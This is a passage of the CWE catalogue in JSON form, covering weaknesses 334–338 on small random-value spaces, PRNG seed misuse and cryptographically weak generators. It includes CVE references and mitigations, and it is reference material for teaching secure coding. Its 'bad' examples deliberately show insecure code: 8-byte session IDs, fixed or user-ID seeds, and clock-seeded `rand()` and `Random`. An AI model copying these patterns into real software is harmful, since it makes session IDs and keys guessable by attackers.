authorization."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;sun-web-app&gt;&lt;/sun-web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...&lt;session-config&gt;&lt;/session-config&gt;...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;session-properties&gt;&lt;/session-properties&gt;","xhtml:div":{"#text":"&lt;property name=\\"idLengthBytes\\" value=\\"8\\"&gt;&lt;/property&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;description&gt;The number of bytes in this web module\'s session ID.&lt;/description&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0583","Description":"Product uses 5 alphanumeric characters for filenames of expense claim reports, stored under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0583"},{"Reference":"CVE-2002-0903","Description":"Product uses small number of random numbers for a code to approve an action, and also uses predictable new user IDs, allowing attackers to hijack new accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0903"},{"Reference":"CVE-2003-1230","Description":"SYN cookies implementation only uses 32-bit keys, making it easier to brute force ISN.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1230"},{"Reference":"CVE-2004-0230","Description":"Complex predictability / randomness (reduced space).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Space of Random Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"335":{"attr":{"@_ID":"335","@_Name":"Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.","Extended_Description":{"xhtml:p":["PRNGs are deterministic and, while their output appears\\n\\t\\t   random, they cannot actually create entropy. They rely on\\n\\t\\t   cryptographically secure and unique seeds for entropy so\\n\\t\\t   proper seeding is critical to the secure operation of the\\n\\t\\t   PRNG.","Management of seeds could be broken down into two main areas:","PRNGs require a seed as input to generate a stream of\\n\\t\\t\\t   numbers that are functionally indistinguishable from\\n\\t\\t\\t   random numbers.  While the output is, in many cases,\\n\\t\\t\\t   sufficient for cryptographic uses, the output of any\\n\\t\\t\\t   PRNG is directly determined by the seed provided as\\n\\t\\t\\t   input. If the seed can be ascertained by a third party,\\n\\t\\t\\t   the entire output of the PRNG can be made known to\\n\\t\\t\\t   them. As such, the seed should be kept secret and\\n\\t\\t\\t   should ideally not be able to be guessed. For example,\\n\\t\\t\\t   the current time may be a poor seed. Knowing the\\n\\t\\t\\t   approximate time the PRNG was seeded greatly reduces\\n\\t\\t\\t   the possible key space.","Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered."],"xhtml:ul":{"xhtml:li":["(1) protecting seeds as cryptographic material (such as a cryptographic key);","(2) whenever possible, using a uniquely generated seed from\\n\\t\\t   a cryptographically secure source"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is used incorrectly, such as using the same seed for each initialization or using a predictable seed, then an attacker may be able to easily guess the seed and thus the random numbers. This could lead to unauthorized access to a system if the seed is used for authentication and authorization."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2018-12520","Description":"Product\'s PRNG is not seeded for the generation of session IDs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12520"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PRNG Seed Error"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"PRNG Seed Error","attr":{"@_Date":"2017-11-08"}}}},"336":{"attr":{"@_ID":"336","@_Name":"Same Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.","Extended_Description":"Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might not consider the need to use new seeds during design."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Other","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not reuse PRNG seeds. Consider a PRNG that periodically re-seeds itself as needed from a high quality pseudo-random output, such as hardware devices."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a statistical PRNG to generate account IDs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final long SEED = 1234567890;public int generateAccountID() {}","xhtml:br":"","xhtml:div":{"#text":"Random random = new Random(SEED);return random.nextInt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack."},{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Same Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Same Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"337":{"attr":{"@_ID":"337","@_Name":"Predictable Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.","Extended_Description":"The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Use non-predictable inputs for seed generation."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2008-0166","Description":"The removal of a couple lines of code caused Debian\'s OpenSSL Package to only use the current process ID for seeding a PRNG","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"},{"Reference":"CVE-2018-9057","Description":"cloud provider product uses a non-cryptographically secure PRNG and seeds it with the current time","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9057"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Predictable Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"338":{"attr":{"@_ID":"338","@_Name":"Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG\'s algorithm is not cryptographically strong.","Extended_Description":{"xhtml:p":["When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks.","Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If a PRNG is used for authentication and authorization, such as a session ID or a seed for generating a cryptographic key, then an attacker may be able to easily guess the ID or cryptographic key and gain access to restricted functionality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Non-cryptographic PRNG"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Non-cryptographic PRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cryptographically Weak PRNG","attr":{"@_Date":"2014-06-23"}}]}},"339":{"attr":{"@_ID":"339","@_Name":"Small Seed Space in 